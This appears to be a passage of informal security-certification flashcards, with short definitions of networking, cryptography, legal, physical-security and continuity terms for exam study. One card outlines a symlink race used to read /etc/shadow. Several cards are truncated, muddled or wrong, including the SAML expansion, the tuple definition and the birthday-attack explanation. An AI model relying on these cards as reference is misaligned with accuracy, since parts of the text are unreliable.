Reset (tear down) a connection

General DRP

Respond Activate Team Communicate Assess Reconstitution

Cryptanalysis

Science of breaking encrypted

Steganography

Science of hidden communications. Hide inside image, Encoding in pixels as bit streams.

Scrum

Scrum development model (named after a scrum in the sport of rugby) is an Agile model first described in "The New New Product Development Game". Holistic approach to Software Development.

SESAME

Secure European System for Applications in a Multi-vendor Environment. single sign-on system that supports heterogeneous environments. the addition of public key (asymmetric) encryption is the most compelling. It addresses one of the biggest weaknesses in Kerberos: the plaintext storage of symmetric keys

SHA-1, SHA-2

Secure Hashing Algorithm. Announced in 1993, and 2001 respectively. SHA-1 160 bit length. SHA-2; has 224, 256,384,512 bit length messages.

SLA

Service Level Agreements are vital when dealing with third-party development shops

SOA

Service Oriented Architecture. Attempts to reduce application architecture down to a functional unit of a service. SOA is intended to allow multiple heterogeneous applications to be consumer of services.

OSI Model

Seven layer model. APSTNDP

Shared Demarc

Shared Telecom Demarcation Point. Where ISPs responsibility end and the customers begins. Should employ strong physical access controls.

STP

Shielded Twisted Pair/Coaxial. Better than UTP

Active Response NIPS

Shoots dow malicious traffic via a variety of methods including forging. TCP RST segments to source or destination (or both), or sending ICMP port, host, or network unreachable to source.

Redundant Network Architecture

Should any single circuit or site go down, at least one alternate path is available

Positive Pressure Drain

Should be employed by HVAC. Means air and water should be expelled from the building. Water should drain away.

Object Reuse

Should be prevented. The act of recovering information from previously-used objects, such as computer files.

System Config Reevaluation.

Should happen every 3 years.

Employee Termination

Should result in immediate revocation of all employee access. Organizations worst enemy can be a disgruntled former employee. Termination should be fair

SDN

Software Defined Networking (SDN) separates a router's control plane from the data (forwarding) plane. Software Defined Networking (SDN) separates a router's control plane from the data (forwarding) plane

Open Source

Software or source code that is publicly available.

SSD

Solid State Drive, a combination of flash memory(EEPROM) and DRAM

Type 3

Something you are: Biometric

Type 2

Something you have: Badge

Type 1

Something you know: PIN

GPS/ IP and Geo-Location

Somewhere you are...

Striping

Spreading data writes across multiple disks to achieve performance gains, used by some levels of RAID

SDLC

Synchronous Data Link Control synchronous Layer 2 WAN protocol that uses polling to transmit data. Polling is similar to token passing

SONET

Synchronous Optical Networking. Carries multiple T-carrier circuits via fiber optic cable. Physical fiber ring for redundancy.

SONET

Synchronous Optical Networking: multiple T-carrier circuits via fiber optic cable

SDLC 2

System Concept Development

OpenFlow

TCP protocol that uses TLS encryption

Relation

Table

Garbage Collection

Takes care of old blocks. Unused and unerased blocks are moved out of the way and erased in the background. Identifies unneeded data and clears the blocks.

Encapsulation

Takes information from a higher layer and adds a header to it, treating the higher layer information as data. One layer's header is another layer's data."

Telnet

Telnet provides terminal emulation over a network. provides no confidentiality. Has limited integrity

BCI

The Business Continuity Institute. The Good Practice Guidelines (GPG) are the independent body of knowledge for good Business Continuity practice worldwide.

OWASP

The Open Web Application Security Project. Represents one of the best application security resources. OWASP provides a tremendous number of free resources dedicated to improving an organziations security posture.

SIEM

The Security Information and Event Manager is a primary tool used to ease the correlation of data across disparate sources

UDP

User Datagram Protocol. A simpler and faster cousin to TCP. UDP has no handshake, session, or reliability. Connectionless. Used for applications that are Lossy.

SDLC

The Systems Development Life Cycle. SDLC is used across the IT industry, but SDLC focuses on security when used in context of the exam. Standards are based on NIST

Brute Force

The attacker calculates the hash outputs for every possible password

Birthday Attack

The birthday attack is used to create hash collisions. Eg: If you add 22/365 + 21/365 + 20/365 + 19/365 ... + 1/365

Crux of SDLC

The concepts of security.

Security Domain

The list of objects a subject is allowed to access. Domains are groups of subjects. Confiedential, Secret, and Top Secret are three security domains used by the DoD.

***NOTE***

The most important objective for all controls is personnel safety. This is especially true for DRP

Ring -1

The newest mode of operation that utilizes a hypervisor(virtual machine, Intel VT, AMD-V).

Enticement

The perpetrator involved is determined to have already broken a law or is intent on doing so.

ARPAnet

The predecessor of the Internet

Tailoring

The process of customizing a standard for an organization

Scoping

The process of determining which portions of a standard will be employed by an organization

Recovery

The recovery phase involves cautiously restoring the system or systems to operational status.

Reporting

The reporting phase of incident handling occurs throughout the process, beginning with detection. Reporting must begin immediately upon detection of malicious activity.

Cryptology

The science of secure communications.

VoIP

Voice over Internet Protocol (VoIP) carries voice via data networks, a fundamental change from analog POTS (Plain Old Telephone Service), which remains in use after over 100 years

Background Check

Thorough investigation should be conducted before hiring someone. A criminal record check should be conducted. All experience and education, certifications verified.

Commandment #10

Thou shalt always use a computer in ways that ensure consideration and respect for your fellow humans.

Commandment #8

Thou shalt not appropriate other people's intellectual output.

Commandment #6

Thou shalt not copy or use proprietary software for which you have not paid.

Commandment #2

Thou shalt not interfere with other people's computer work.

Commandment #3

Thou shalt not snoop around in others computer files.

Commandment #5

Thou shalt not use a computer to bear false witness.

Commandment #1

Thou shalt not use a computer to harm other people/

Commandment #4

Thou shalt not use a computer to steal.

Commandment #7

Thou shalt not use other peoples computer resources without authorization or proper compensation.

Commandment #9

Though shalt think about the social consequences of the program you are writing or the system you are designing.

KLOC

Thousand(K) Lines Of Code

Misuse Case Testing

To formally model, again most likely using UML, how security impact could be realized by an adversary abusing the application

TCP

Transmission Control Protocol is a reliable Layer 4 protocol. Uses a three-way handshake to create reliable connections across a network

TLS

Transport Layer Security is the latest version of SSL, equivalent to SSL version 3.1. May be used to encrypt many types of data

TCP Flags

URG ACK PSH RST SYN FIN

Computer Fraud and Abuse Act - Title 18 Section 1030

US Law Pertaining to computer crimes. Attacks on protected computers, government, financial computers. $5,000 damage considered criminal.

Flash Memory

USB Thumb Drives. Specific type of EEPROM used for small portable disk drives. Magnetic field will not erase Flash Memory.

100baseT

UTP means 100 megabit, baseband, twisted pair.

Motion Detectors

Ultrasonic and microwave work like "Doppler Radar". Bounces. Photoelectric sends beam of light and alerts if light beam is broken. Sensors are active. Physical Intrusion detection Passive Infrared detects body heat.

UPS

Uninterruptible Power Supplies provide protection against electrical failure.

Primary Key

Unique value in table

Need to Know

User must need to know that specific piece of information before accessing it.

False Positive

User surfs the Web to an allowed site, and NIDS alerts

True Negative

User surfs the Web to an allowed site, and NIDS is silent

Mode of Operation(Access control)

Uses either a discretionary access control implementation or a mandatory access control implementation. 4 Modes: 1. Dedicated 2. System High 3. Compartmented 4. Mutlilevel

One-Time Pad

Uses identical paired pads of random characters, with a set amount characters per page. Eg: Y + C = B, then B - C = Y. The one time pad is the only encryption method that is mathematically proven to be secure. If the following three conditions are met.

Fiber Optic Network Cable

Uses light to carry information, which can carry a tremendous amount of information. Past 50 miles. Multimode uses light dispersion. Single Mode use one strand.

Asset Value(AV)

Value of an asset

Risk = Threat × Vulnerability Equation

Vulnerability scanning factor equating

Ward

Warded locks must turn a key through channels (called wards).

IAB Practice 3

Wastes resources (people, capacity , computer) through such actions.

WDM

Wavelength Division Multiplexing allows multiple signals to be carried via the same fiber

TFTP

Which runs on UDP port 69. It provides a simpler way to transfer files and is often used for saving router configurations or "bootstrapping"

WAN

Wide Area Network, typically covering cities, states, or countries

SAM File

Windows stores hashes for passwords on the Local Machine and Domain Controller in this file.

WLAN

Wireless Local Area Network. Generally has no way to assure availibility

802.11

Wireless technology. 802.11i is the first variation to provide reasonable security.

Civil Law(Common Law)

Within common law, civil law refers to laws put in place in in order to compensate a victim monetarily for damages.

Antivirus software

designed to prevent malware infections

Penetration Tester must...

always protect data and system integrity.

DNS cache poisoning attack

an attempt to trick a caching DNS server into caching a forged response.

Prototyping

an iterative approach that breaks projects into smaller tasks, creating multiple mockups (prototypes) of system design features.

Greenfield

an undeveloped lot of land

Relational Database

contain two-dimensional tables of related data.

Database Dictionary

contains a description of the database tables.

Decryption

converts ciphertext into plaintext

Static Routes

fixed routing entries stating "The route for network 10.0.0.0/8 routes via router 192.168.2.8." Small/Home Offices have static "default" route that sends all external traffic to one router. Set preferences via specific routing protocols

Operating System:

• System events • Audit records

Authentication Server (AS)

a server that authenticates a supplicant (802.1X)

Attribute

A Column in a attribute.

Well-Formed Transactions

Ability to enforce control over applications. This process is comprised of the "access control triple:" user, transformation procedure, and constrained data item.

Inactive Account Policy

Accounts inactive for more than 30 consecutive days. Identifying new accounts that have not been used for more than 10 days following their creation

NIST SDLC Step 11

Accreditation: The formal authorization by the accrediting (management) official for system operation and an explicit acceptance of risk.

11:CK

Acknowledge received data

Acquistion of Media

Acquisition will leverage binary backups and the use of hashing algorithms to verify the integrity of the binary images

Canons(2)

Act honorably, honestly, justly, responsibly, and legally

ARP

Address Resolution Protocol is used to translate between Layer 2 MAC addresses and Layer 3 IP addresses. Think ARP Cache poisoning(MitM)

Virtualization

Adds software layer between OS and Computer Hardware. Runs stocks OS

Access Control Categories

Administrative, Technical, Physical.

Overwriting

"Deleting" removes the entry from the File Allocation Table (FAT) and marks the data blocks as "unallocated"

BS-25999 and ISO 22301

"Part 1, the Code of Practice, provides business continuity management best practice recommendations Part 2, the Specification, provides the requirements for a Business Continuity Management System (BCMS) based on BCM best practice. specifies the requirements for setting up and managing an effective business continuity management system (BCMS) for any organization of any size/type.

WORM

(Write Once Read Many) Storage can be written to once, and read many time. Supports legal or regulatory compliance. Eg: CD-R (CD-RW and DVD-RW are not WORM media). SOme Digital Linear Tape(DLT) drives and media support WORM.

Halon Replacements

- Argon -FE-13 -FM-200 -Inergen

Core Principles of PCI-DSS

- Build and Maintain a Secure Network and Systems. - Protect Cardholder Data -Maintain Vulnerability Management Program -Implement Strong Access Control Measures. -Regularly Monitor and Test Networks. -Maintain an Information Security Policy.

"PASS" method (For Portable Extinguishers)

- Pull Pin - Aim Low - Squeeze the Pin - Sweep the fire

5 Components of PKI

-Certification Authorities (CAs) that issue and revoke certificates -Organizational Registration Authorities (ORAs) that vouch for the binding between public keys and certificate holders -Certificate holders that are issued certificates and can sign digital documents -Clients that validate digital signatures and their certification paths from a known public key -Repositories that store and make available certificates and Certificate Revocation Lists (CRLs)

IPv6 to MAC

-Take the MAC address: 00:0c:29:ef:11:36 -Embed the "fffe" constant in the middle two bytes: 00:0c:29:ff:fe:ef:11:36 -Set the "Universal Bit": 02:0c:29:ff:fe:ef:11:36 -Prepend the network prefix & convert to ":" format: fc01:0000:0000:0000:020c:29ff:feef:1136 -Convert one string of repeating zeroes to "::": fc01::20c:29ff:feef:1136

BCP/DRP Items:

1. Executive management support is needed for initiating the plan. 2. Executive management support is needed for final approval of the plan. 3. Executive management must demonstrate due care and due diligence and be held liable under applicable laws/regulations.

Forensic Phases

1. Identification of potential evidence 2. Acquisition of that evidence 3. Analysis of the evidence 4. Production of a report

Race Condition /etc/shadow

1. If the file "test" is readable by the user 2. Attacker deletes "test," creates symbolic link from "test" to /etc/shadow 3. Run another process 4. Then open the file "test" (now a symbolic link to /etc/shadow)

Expert System Example

1. If your computer is turned on a. Else: turn your computer on 2. Then if your monitor is turned on a. Else: turn your monitor on 3. Then if your OS is booted and you can open a cmd.exe prompt a. Else: repair OS 4. Then if you can ping 127.0.0.1 a. Else: check network interface configuration 5. Then if you can ping the local gateway a. Else: check local network connection 6. Then if you can ping Internet address 192.0.2.187 a. Else: check gateway connectivity 7. Then if you can ping syngress.com a. Else: check DNS

Five mistakes of Log Analysis

1. Logs are not reviewed on a regular and timely basis. 2. Audit logs and audit trails are not stored for a long enough time period. 3. Logs are not standardized or viewable by correlation toolsets—they are only viewable from the system being audited. 4. Log entries and alerts are not prioritized. 5. Audit records are only reviewed for the "bad stuff."

ISO 17799 11 Areas

1. Policy 2. Organization of Information Security 3. Asset Management 4. Human Resources Security 5. Physical and Environmental Security 6. Communications and Operations Management 7. Access Control 8. Information systems acquisition, development, and maintenance 9. Information security incident management. 10. Business continuity management 11. Compliance

8 Step Incident Handling Methodology

1. Preparation 2. Detection (aka Identification) 3. Response (aka Containment) 4. Mitigation (aka Eradication) 5. Reporting 6. Recovery 7. Remediation 8. Lessons Learned (aka Post-incident Activity, Post Mortem, or Reporting)

NIST Incident Response

1. Preparation 2. Detection and Analysis 3. Containment, Eradication and Recovery 4. Post-incident Activity

Object-Oriented Analysis and Design(OOAD) on NIDS

1. Sniffs packets from a network and converts them into pcap (packet capture) format; 2. Analyzes the packets for signs of attacks, which could include Denial of Service, client-side attacks, server-side attacks, web application attacks, and others; 3. If a malicious attack is found, the NIDS sends an alert. NIDS may send alerts via email, paging, syslog, or security information and event managers (SIEMs).

Class C

192.0.0.0 - 223.255.255.255 256 addresses

TCP Header Fields

20 bytes in all: - Source and Destination port - Sequence and Acknowledgment Numbers: Keep full-duplex communication in sync - TCP Flags - Window Size: Amount of data that may be sent before receiving acknowledgment COnnects from High number(ex: 51870 to Low Number(ex: 22)

Limited Broadcast Address

255.255.255.255

Graham-Denning Model

3 Part Model: Objects, Subjects, and Rules. Provides granular approach for interaction between subjects and objects. R1: Transfer Access R2: Grant access R3: Delete Access R4: Read Object R5: Create Object R6: Destroy Object R7: Create Subject R8: Destroy Subject

DoD Destruction Method(Gutman Approach)

3, 7 ,or 35 Successive Passes respectively. For undamaged magnetic media: now it is commonly considered acceptable in industry to have a simply single successful pass that renders data unrecoverable.

X86 CPU's

32 Bit Processors, CISC

Escrowed Encryption

3rd party organization holds copy of public /private key pair. Private key is divided into two or more parts, each held in escrow. Only release with proper authorization. Offers balance between privacy and need of law enforcement.

TCP/IP Model

4 layer model. Network Access, Internet, Transport, Application.

Divestitures

AKA De-mergers or De-acquisitions. One company become two or more. The split of sensitive information needs to be monitored closely as the risk of insider attacks will exist. i.e. Old credentials, duplicate accounts, badges, security controls.

Administrative Law

AKA Regulatory Law is law enacted by government agencies. The executive branch of the U.S. Government can create administrative law without requiring input from the Legislative branch.

Encapsulation

AKA data hiding

Defense-in-Depth

AKA layered defenses, applies multiple safeguards(controls: measures to reduce risk) to protect an asset. Multiple controls help improve the confidentiality, integrity, and availability of your data.

Cybersquatting

AKA typosquatting refers to an individual or organization registering or using, in bad faith, a domain name that is associated with another person's trademark

Swapping

AKA, Paging. Uses Virtual Memory. Copies a block of memory to or from a disk.

Asynchronous Response Mode

ARM Secondary nodes may initiate communication with the primary

Canon(4)

Advance and protect the profession.

Dummy File

Also called a flag, is a file that is provided to the tester in place of a real file containing sensitive or protected data.

Traceability Matrix

Also called an RTM can be used to map customers' requirements to the software testing plan

Strong authentication

Also called multifactor authentication requires that the user present more than one authentication factor

Synthetic Transactions

Also called synthetic monitoring: involves building scripts or tools that simulate activities normally performed in an application

Southbridge(Bus)

Also called the I/O Controller Hub connects Input/Output devices(i.e keyboard, mouse, CD Drive.

Northbridge(Bus)

Also called the Memory Controller Hub (MCH), connects the CPU to RAM and video memory.

Fetch & Execute

Also called, "Fetch, Decode, Execute." CPUs fetch machine language instructions.(add "1+1" 1.Fetch 2. Decode 3. Execute 4. Write(Save) These four steps take one clock cycle to complete.

Meeting Point Leader

Assures that all personnel are accounted for at the emergency meeting point. Avoid during evacuation

ATM

Asynchronous Transfer Mode. WAN technology that uses fixed length cells. 53 bytes long, with a 5-byte header and 48-byte data portion.

ARCNET(Deterministic)

Attached Resource Computer Network is a legacy LAN technology. ARCNET ran at 2.5 megabits and popularized the star topology

Known Key

Attacker knows something about the Key.

AOC

Attestation of Compliance

Server Rooms

Auditing physical access to server rooms is necessary to maintain physical security. Door security is key.

NIST SDLC Step 15

Audits and Monitoring: A system audit is a one-time or periodic event to evaluate security. Monitoring refers to an ongoing activity that examines either the system or the users.

CHAP

Challenge Handshake Authentication Protocol. A more secure authentication protocol. Does not expose clear text. PW stored on CHAP server.

LEAP

Cisco-proprietary protocol released before 802.1X was finalized. Flaws, should not be used

***Exam Warning***

Clark-Wilson requires that users are authorized to access and modify data. It also requires that data is modified in only authorized ways.

Classful IPv4 Networks

Classes A - E. For normal networks, A - C

Gates

Classes I - IV ASTM F2200

CIDR

Classless Inter-Domain Routing allows far more flexible network sizes than those allowed by classful addresses.

Full-duplex

Communication send or

Digital

Communications transfer data in bits: ones and zeroes

Centralized access control

Concentrates access control in one logical point for a system or organization. Instead of using local access control databases, systems authenticate via third-party authentication servers

Binary or Bit stream image

Creates an exact replica of the original data is needed

XSS

Cross-Site Scripting (XSS) leverages third-party execution of web scripting languages such as JavaScript within the security context of a trusted site.

Purpose(Policy)

Describes the need for policy to protect the confidentiality, integrity and availability of protected data.

Deterrent Controls

Deters users from performing actions on a system. Examples include a "beware of dog" sign.

SSL

Developed for Netscape Web Browser. Secure Sockets Layer(SSL) authenticates and provides confidentiality to Web Traffic. Transport Layer Security(TLS) is the successor to SSL. Used as a part of HTTP. Eg: Connect to a Website(asymmetric encryption), Browser downloads the digital certificate, includes public key.

SDLC 6

Development

NIST SDLC Step 4

Development/acquisition: The system is designed, purchased, programmed or developed.

Service Level Agreements

Dictate what is considered acceptable regarding things such as bandwidth, time to delivery, response times, etc.

DNS

Domain Name System a distributed global hierarchical database that translates names to IP addresses. Uses both UDP and TCP. 2 functions: gethostbyname()(given a name Returns an IP address. gethostbyaddr()(given an address.) Returns the name.

Deadbolt

Door cannot be closed when the deadbolt is locked. extend into the strike plate

Attestation

Ensures scrutiny has been applied to an organization's security posture. Attestation of security posture usually follows an audit. SAS 70 Review

XOR

Exclusive Or. The secret sauce behind modern encryption. Combining a key with a plaintext via XOR creates a ciphertext. XOR-ing the same key to the ciphertext restores the original plaintext.

Privileged Programs

Execution bit "s" is defined as superuser set uid/gid

PATRIOT Act of 2001

Expanded law enforcements electronic monitoring capabilities. Broader coverage for wiretaps, search and seizure without immediate disclosure. Generally lessened judicial oversight of law enforcement.

Due Diligence

Expectation of staff/subordinate to exercise due care.

RAID 10(1 + 0)

Explicitly indicate the nesting, the configuration is that of a striped set of mirrors. System Redundancy

Chain of Custody

Express the reliability of evidence. Once evidence is acquired, full documentation be maintained regarding the who, what, when, and where relating to the handling of said evidence. i.e. signatures.

The Copyright Term Extension Act, 1998

Extended the Copyright term by 20 years. At the time, Author copyright was 50 years, 75 for Corporate.

EAP

Extensible Authentication Protocol is an authentication framework that describes many specific authentication protocols. Provides authentication at Layer 2"port based"

XML

Extensible Markup Language. Standard wary to encode documents and data. XML is similar to HTML. Used on the web but not tied to it. XML is used to define a users own data format.

EGP

Exterior Gateway Protocols BGP (Layer 3)

Doors

External facing hinges are a security concern.

Proxy Firewalls

Firewalls that act as intermediary servers. Both the packet filter and stateful firewalls pass traffic through or deny it. Proxies terminate connections.

Mantrap

First door locks before second can open.

Forensic Software Analysis

Focuses on comparing or reverse engineering software: reverse engineering malware is one of the most common examples. Investigators are often presented with a binary copy of a malicious program, and seek to deduce its behavior

Communications and Network Security

Focuses on the confidentiality, integrity and availability of data in motion.

Tailgating

Following an authorized person into a building without providing credentials

Business Continuity Planning

For ensuring that the business will continue to operate before, throughout, and after a disaster event is experienced.

Shareware

Fully functional proprietary software that may be initially used free of charge

IPv4

Internet Protocol version 4 is the fundamental protocol of the Internet. IPv4 was used for the Arpanet. imple protocol, designed to carry data across networks. 32 bit addresses

IDS

Intrusion Detection System. Detective device designed to detect malicious (including policy-violating) actions

IPS

Intrusion Prevention System. A preventive device designed to prevent malicious actions.

Vernam Cipher

Invented by Gilbert Vernam(Employee of AT&T Bell Labs). Used bits that were XORed to plaintext bits.

Active-passive cluster

Involves devices or systems that are already in place, configured, powered on, and ready to begin processing network traffic should a failure occur on the primary system.

Active-active cluster

Involves multiple systems all of which are online and actively processing traffic or data

Partial and Complete Business Interruption

Involves real interruption. Extreme caution should be exercised before attempting an actual interruption test.

Smoke detectors

Ionization and Photoelectric. Dust can trigger leading to false alarms

Free software

Is a controversial term that is defined differently by different groups.

Kerberos Steps

Kerberos Principal Alice contacts the KDC The KDC sends Alice a session key, encrypted with Alice's secret key. The KDC also sends a TGT (Ticket Granting Ticket), encrypted with the TGS's secret key Alice decrypts the session key and uses it to request permission to print from the TGS (Ticket Granting Service). Seeing Alice has a valid session key (and therefore has proven her identity claim), the TGS sends Alice a C/S session key (second session key) to use to print. The TGS also sends a service ticket, encrypted with the printer's key. Alice connects to the printer. The printer, seeing a valid C/S session key, knows Alice has permission to print, and also knows that Alice is authentic. ***KDC and TGS are separate services.***

Kerberos FAQ`

Kerberos is a network authentication system for use on physically insecure networks, based on the key distribution model presented by Needham and Schroeder. It allows entities communicating over networks to prove their identity to each other while preventing eavesdropping or replay attacks. It also provides for data stream integrity (detection of modification) and secrecy (preventing unauthorized reading) using cryptography systems such as DES (Data Encryption Standard)."

Key Clustering

Key Clustering occurs when two symmetric keys applied to the same plaintext produce the same ciphertext

Diffie-Hellman Key Agreement Protocol

Key agreement allows two parties to securely agree on a symmetric key via a public channel, such as the Internet, with no prior key exchange

Key locks

Key locks require a physical key to unlock. Many keys contain the bitting code for the key. 74226. 0-9(0 shallow, 9 quite deep

Expert Systems

Knowledge Base and Inference Engine

Rijndael

Known as AES. Best combination of security, performance, efficiency, and flexibility.

Costliness of DRP Testing

LEAST • DRP Review •ReadThrough/Checklist/Consistency • Structured Walkthrough/Tabletop • Simulation Test/Walkthrough Drill • Parallel Processing • Partial Interruption • Complete Business Interruption MOST

Wiring closets

Lack of security regarding wiring closets present a physical access issue

Progressive Discipline

Ladder of Discipline. Coaching. Formal Discussion. Verbal warning meeting, with Human Resources attendance. Written warning meeting, with Human Resources attendance (perhaps multiple warnings). Termination

Microsoft LM

LanMan passwords are converted to upper case before hashing, and therefore case sensitivity is irrelevant)

Bridges

Layer 2 Device. 2 ports. Connects network segments together. Learns MAC addresses of nodes on either side. Provides traffic isolation. 2 "Collision" Domain.

Bridge

Layer 2 Device. Has 2 ports, and connects network segments together. Segments have multiple nodes. Learns the MAC Addresses on nodes on either side. Has 2 collision domains.

Application Layer Proxy Firewalls

Makes decisions based on Application Layer Data(e.g. HTTP Traffic). Must understand the protocol that Is proxied (often dedicated)

Virtualization Issues

Multiple hosts on one system raises security concerns.

SDLC 9

Operations and Maintenance

Discrete Logarithm

Opposite exponentiation. Computing 7 to the 13th power (exponentiation) is easy on a modern calculator: 96,889,010,407 Asking the question "96,889,010,407 is 7 to what power"

Diffusion

Order of plaintext should be diffused in the ciphertext.

Data Collection Limitation

Organization should collect the minimum amount of sensitive information that is required. There should be limits to the collection of personal data.

Key Storage

Organization that issues the public/private key paris retains a copy.

OFDM

Orthogonal Frequency-Division Multiplexing

Shared Tenancy

Other tenants pose a risk because they are already behind perimeter. Adjacent buildings also pose a risk. British Bank of the Middle East(1976...Hole in Church)

OFB

Output Feedback. Differs from CFB in the way feeback is accomplished. Uses previous ciphertext for feedback. **STREAM**

Halon

Ozone depleting properties. Chemical reaction that consumes energy and lowers the temperature of the fire. See Montreal Protocol.

PDA

PDAs should use secure wireless connections

SPF10

PDU's; Segments, Packets, Frames, Ones and Zeroes

PCI-DSS

Payment Card Industry Data Security Standards. Industry Specific. Created by PCI-SSC. Standards seek to protect credit cards by requiring vendors using them to take specific security precautions. It is a multi-faceted security standard that includes requirements for security management. Protecting customer data.

Arithmetic Logic Unit(ALU)

Performs mathematical calculations. It computes. It is fed instructions by the control unit which acts as traffic cop

PII

Personally Identifiable Information

Conflicts Of Interest(CoIs)

Pertain to accessing company sensitive information from different companies that are in direct competition with one another. Eg: Chinese Wall Model requires that CoIs be identified so that once a consultant gains access to one CoIs.

Crosstalk

Poorly shielded or too close cable impacts a separate conversation.

PAT

Port Address Translation. typically makes a many-to-one translation from multiple private addresses to one public IP address. Solution for homes and small offices.

PGP

Pretty Good Privacy brought Asymmetric Encryption to the masses(1991). Users could communicate without sharing a key. Provides confidentiality, integrity, authentication, and nonrepudiation. Used to encrypt emails, documents, or disk drives. Web of Trust Model, Trust me, Trust everyone that I trust

Controlling Access

Preventing unauthorized access.

Access Control Types(6)

Preventive Detective Corrective Recovery Deterrent Compensating

Locks

Preventive physical security control.

Memory Protection

Prevents one process from affecting the confidentiality, integrity, or availability of another.

Computer Bus

Primary communication channel on a computer system. Communication between CPU, Memory, I/O Devices occur via the bus.

Microsoft Windows Active Directory

Primary means to control access. Uses Kerberos. Has been integrated into Microsoft Windows operating systems since Windows 2000

Factoring prime numbers

Prime Number: divisible by 1 and itself Composite Number: Evenly divisible by numbers other than 1 and itself. Eg: "which prime number times which prime number equals 49,418,527" is much more difficult

RFC 1918 addresses

Private IPv4 addresses that may be used for internal traffic 10.0.0.0 - 10.255.255.255/8 172.16.0.0 - 172.31.255.255/12 192.168.0.0 - 192.168.255.255/16

UPSs

Protect against electric failures. Backup power is provided via batteries or fuel cells.

Surge Protectors,

Protect against electric failures. Circuit or fuse that is tripped during a power spike or surge

Canons(1)

Protect society, the commonwealth, and the infrastructure.

PEAP

Protected EAP; Cisco Systems, Microsoft, and RSA Security, is similar to (and may be considered a competitor to) EAP-TTLS. Doesn't require client-side certificates.

Data Execution Prevention

Protection against memory corruption. Ensures that memory locations not pre-defined to contain executable content will not have the ability to have code executed. Prevents shell code execution

Link State Routing Protocols

Protocol factors in additional metrics for determining the best route, including bandwidth.

Virtual Memory

Provide Virtual Addresses between applications and hardware memory> ***Allows Swappng***

Canons(3)

Provide diligent and competent service to principals.

Ten Commandments of Computer Ethics

Provided by the Computer Ethics Institute as code for information security professionals to abide by.

Network Tap

Provides a way to tap into network traffic and see all traffic(including all unicast) Taps are the preferred way for access to sniffer or NIDS

Authentication Header(AH)

Provides authentication and integrity for each packet of the network data. Acts as a digital signature for The data. Protects against replay attacks.

Secure Real-time Transport Protocol

Provides confidentiality, integrity, and secure authentication. oIP traffic sent via insecure networks should be secured via SRTP

ShiftRows

Provides diffusion by shifting rows Row 0 is unchanged Row 1 is shifted 1 left Row 2 is shifted 2 left Row 3 is shifted 3 left

Custodian

Provides hands-on protection of assets such as data. Follow detailed orders.

Tailoring Process: 6

Providing additional specification information for control implementation, if needed. Tailoring process involves "parameters" including; password complexity policies

Fire Suppression

Reduce Temperature Reduce Oxygen Supply Reduce Fuel Supply Interfere Reaction

RISC

Reduced Instruction Set Computer. Uses a reduced set of simpler instructions.

Register Direct Addressing

References a CPU cache register

Internet of Things (IOT)

Refers ato a small internet of connected devices, smart meters, baby monitors, cash registers, cars, fitness monitors. All things are directly accessible via the internet.

Covert Timing Channel

Relies on system clock to infer sensitive information

Remediation

Remediation steps occur during the mitigation phase, where vulnerabilities within the impacted system or systems are mitigated.

RADIUS

Remote Authentication Dial In User Service , a third-party authentication system. 1812, 1812, 1645, 1646. Ensures authentication, authorization, and accounting

Overwriting

Results are poor. It is not a universally reliable method of sanitization.

RARP

Reverse ARP. used by diskless workstations to determine its IP address. "Who am I? Tell me."

SSL

Secure Socket Layer designed to protect HTTP (Hypertext Transfer Protocol) data: HTTPS uses TCP port 443. May be used to encrypt many types of data. SSL client software does not require altering the operating system

SAML

Security Association Markup Language. XML based framework for exchanging security information.

NIST SDLC Step 13

Security Operations and Administration: Examples include backups, training, managing cryptographic keys, user administration, and patching.

NIST SDLC Step 10

Security Testing: Used to certify a system; may include testing security management, physical facilities, personnel, procedures, the use of commercial or in-house services (such as networking services), and contingency planning.

NIST Special Publication 800-53

Security and Privacy Controls for Federal Information Systems and Organizations

Mobile Device Attacks

Security challenges ranging from USB Flash Drives and Laptops.

NIST Special Publication 800-14

Security, like other aspects of an IT system, is best managed if planned for throughout the IT system life cycle. There are many models for the IT system life cycle but most contain five basic phases: initiation, development/acquisition, implementation, operation, and disposal."

IAB Practice 1

Seeks to gain unauthorized access to the resources of the internet

Confidentiality

Seeks to prevent the unauthorized disclosure of information: it keeps data secret

Tailoring Process: 3

Selecting compensating security controls, if needed;

Half Duplex

Send or receive at one time only (Walkie Talkie)

RSA

Sends AES key(symmetric). Symmetric key is called a session key. A new session may be retransmitted via RSA Approach leverages the strengths of both cryptosystems.

Backups

Sensitive backup data should be stored offsite, whether transmitted offsite via networks, or physically moved as backup media. Ensure backup sites are unlikely to be impacted by the same disaster that may strike the primary site.

Software Defined Networking

Separates a router's control plane from the data. Data plane forwards data (packets) through the router

Layering

Separates hardware and software functionality into modular tiers

Flat file

Simplest form of a database

SSO Advantages

Simplified administration, Improved user productivity, Improved developer productivity.

SSO

Single Sign-On is where a subject may authenticate once, and then access multiple systems

Tuple

Single cell in a relational database

"Point. Click. Root"

Slogan illustrates the fact that script kiddie tools such as the Metasploit Framework are of high quality and can achieve impressive results.

Pre-Action

Systems are a combination of wet, dry, or deluge systems, and require two separate triggers to release water

T Carriers

T1 is a dedicated 1.544-megabit (1.5mb) A T3 is 28 bundled T1s(45 mb)

TACACS+

TACACS+ provides better password protection by allowing two-factor strong authentication. Uses TCP port 49 for authentication with the TACACS+ serve

IRC server

TCP port 6667 by default. Used by malware, which may "phone home" to a command-and-control channel via IRC. Chat software may be subject to various security issues, including remote exploitation, and must be patched like any other software

***Note***

TCP, UDP, and ICMP are Layer 4.

BCP/DRP Reminder

These are the final controls. If these fail, the business can fail. "Have we made mistakes that threaten the success of our plan?"

Transport Mode

Transport Mode only encrypts the data (and not the original headers); AH is often used along with ESP in transport mode.

TDES

Triple Data Encryption Standard: Public algorithm that has stood the test of time

4 Types of events

True Postive, True Negative, False Positive, and False Negative.

TCSEC(AKA "The Orange Book")

Trusted Computer System Evaluation Criteria. Also ITSEC, and "The Common Criteria." Criteria and Evaluation Method for choosing security products. D: Minimal Protection C: Discretionary Protection B: Mandatory Protection A: Verified Protection One of the first security standards implemented

TNI/Red Book

Trusted Network Interpretation(TNI) brings TCSEC concepts to network system. It is often called the "red book", due to the color of it's cover. *TCSEC does not address network issues.

Tunnel Mode

Tunnel mode provides confidentiality (ESP) and/or authentication (AH) to the entire original packet. Both modes add extra IPsec headers

Fuzzing

Type of black box testing that submits random, malformed data as inputs into software programs to determine if they will crash. Random input strings, command line inputs, environment variables. Any program that crashes has failed the fuzz test.

Software Testing Levels

Unit Testing, Installation Testing, Integration Testing, Regression Testing, and Acceptance Testing

UTP

Unshielded Twisted Pair; susceptible to EMI and crosstalk

Fiber Optic Cables

Use light instead of electricity to Transmit Data

Digital Watermarks

